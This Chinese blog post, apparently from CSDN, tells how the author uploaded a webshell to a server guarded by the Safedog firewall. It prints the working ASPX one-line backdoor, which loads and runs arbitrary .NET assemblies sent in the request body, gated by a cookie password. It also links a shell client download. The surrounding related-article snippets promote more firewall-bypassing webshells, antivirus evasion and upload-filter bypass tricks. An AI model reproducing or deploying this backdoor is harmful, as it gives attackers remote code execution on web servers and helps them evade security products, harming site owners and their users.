可突破安全狗的aspx一句话

最新推荐文章于 2024-05-11 05:25:41 发布
最新推荐文章于 2024-05-11 05:25:41 发布
阅读量1.1k 收藏
点赞数
分类专栏: webshell 文章标签: null object 服务器 shell iis c#

在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。

服务端一句话木马:

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
客户端截图:

 

我的网盘:ASPX一句话shell客户端.rar

fengling132
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
无限免杀D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3510
前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句 Aspx的一句一般是使用Jscript语言实...
安全狗aspx一句webshell
02-08
安全狗aspx一句webshell 纯CS模式,经典免杀
2024年最全免杀思路总结_sophos免杀,2024年最新2024年我们程序员该如何进阶和规划
最新发布
2401_84520457的博客
05-11 288
1.免杀技术简介2.杀毒软件检测方法3.绕过技术1.免杀的重要性2.免杀的难度3.杀毒软件的排行国外 国内2 、Norton 360 2、智量安全(没测过,据说很厉害)3 、Kaspersky 3、火绒安全4 、Webroot 4、金山独霸还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
shell 免杀aspx_避开eval关键字,打造免杀一句木马
weixin_30304773的博客
01-16 1936
这年头留个php一句木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
ASPX一句***--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
weixin_34366546的博客
08-09 627
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:本文章首发[url]http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx[/url],后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。首先回顾一下以前ASP一句的经典***吧! <...
史上最全一句木马
hackzkaq的博客
06-29 7779
目录 PHP //可执行命令一句 PHP系列 过狗一句 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句 ASP过安全狗一句 ASPX系列 ASPX一句的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 617
一句木马在渗透测试中最常用的就是一句后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。最常见的php一句木马这个一句木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
aspx一句
02-26
aspx一句,为你提供asp,php,jsp,aspx一句
安全狗aspx一句.rar
07-23
好东西啦,完美突破安全狗垃圾防火墙 ,黑阔软件
ASPX一句shell客户端
06-16
ASPX一句shell客户端是Web应用程序安全领域中的一个关键概念,主要与网络安全和恶意攻击相关。在Web服务器上,ASPX是Microsoft .NET框架用于创建动态网页的一种编程语言,类似于PHP或JSP。当一个ASPX页面被恶意...
Aspx一句网马Webshell.rar
01-07
这个压缩包文件"Aspx一句网马Webshell.rar"很可能包含了此类恶意代码的实例,用于教学、研究或安全测试的目的。 首先,我们需要理解ASPX的背景。ASPX是微软.NET框架下的网页开发技术,用于创建动态交互式网站。它...
ASPX一句木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
热门推荐
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net  动态执行也就不存在
shell 免杀aspx_发个免杀修改的aspx提权马qingshell.aspx
weixin_35795675的博客
01-30 581
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
Aspx 一句木马和客户端(备用)
eldn__的专栏
04-18 1635
以下是引用片段: 这个一句不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
Webshell和一句木马
qq_44040833的博客
02-09 1288
大马 webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也就是一种网页后门。黑客在入侵了一个网站后,很多人通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器...
ashx后门
10-26 1232
一、标准ASPX一句木马 .NET平台下的一句木马则百年不变,最常见的当属下面这句 <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%> 想必这句已经成大多数防御产品的标准样本,除此以外还有上传文件的一句,像这种的从严格意义上不能算是一句木...
免杀一句
cc1988429的专栏
04-18 2398
0x01:ASP一句 1. 2. 3. 0x02:免杀大部分网站的一句 4. 0x03:免杀部分网站过略的一句 5.executerequest("x") 0x04:免杀部分网站过略双引号的一句 6. 0x05:php一句 7. 0x06:aspx一句 8. WebAdmin2Y.x.y aaaaa = newWebAdmin2Y.x.y("x");
shell 免杀aspx_[9期]软WAF上传绕过+webshell免杀
weixin_42311335的博客
12-31 258
安全狗上传绕过思路:1.扰乱编码form-data 替换成 ~form-data form-data 改成f+orm-dataform-data 改成form-d+ata form-data 替换成 "filename="xxx" 改成filename=xxx;增减空格对Content-Disposition,Content-T...
过狗一句汇总(包含asp+php+aspx+jsp)
01-26
过狗一句汇总,是一个用于表示利用各种网站漏洞在网站上发布恶意代码的黑客行为。这个词通常与ASP、PHP、ASPX、JSP等网站开发语言相关联。黑客们会在网站上植入恶意代码,比如恶意脚本、木马病毒等,以获取用户的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值